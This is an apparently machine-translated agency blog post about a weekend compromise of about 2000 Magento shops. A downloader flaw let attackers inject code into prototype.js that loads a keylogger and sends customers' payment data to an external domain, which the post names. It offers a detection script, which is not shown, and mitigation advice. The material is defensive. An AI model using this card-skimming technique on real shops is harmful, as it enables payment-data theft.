Magento – More than 2000 Shops worldwide hacked in a weekend

Not only the corona virus is currently making a name for itself. The news about 2000 hacked Magento shops has been circulating since last weekend and is causing a lot of unrest in the Magento community. At first, no details were known how and what happened, but more became known every hour. So the purpose of the hack was to intercept customer payment data. The script installs a keylogger, who notes the entered data and transmits it to third parties.
Now it has been published, that the hack a security vulnerability in connection with Magento Connect or. exploits the Magento downloader. This is used to copy malicious code to prototype.js, on a widget on an external server m c d n n .net (without space) refers.
There is more information here

We wrote a very simple script, which checks your online shop for this malicious code. All you have to do is enter the complete URL of the shop and click on it “Check” be clicked. The script then checks, whether in the (publicly accessible) prototype.js a reference to the above. external domain exists.

The script also offers the possibility to check multiple URLs. Simply enter one URL per line and have it checked.

What helps against this security gap? Simplest answer: Magento 2, alternatively in this specific case (according to the current status) Deactivating the Magento Connect function also helped (very simple option: the folder “downloader” delete or rename in the root directory). This is deactivated by default in our customer projects, to generally exclude such security gaps in Magento Connect.

The script for the test (excluding any warranty!) there HERE

If there is more news, we will update the article.

For questions or support – just contact us.

Published by Covos

Since 2009 I have been working intensively with Magento. I started with the creation and operation of B2C stores. This was extended through my work in the logistics sector. This resulted first specialized B2E systems. Today I work day-a day with exciting B2C, B2B- and B2E projects and reports in this blog about challenges and give insider tips.

Leave a Reply

Your email address will not be published. Required fields are marked *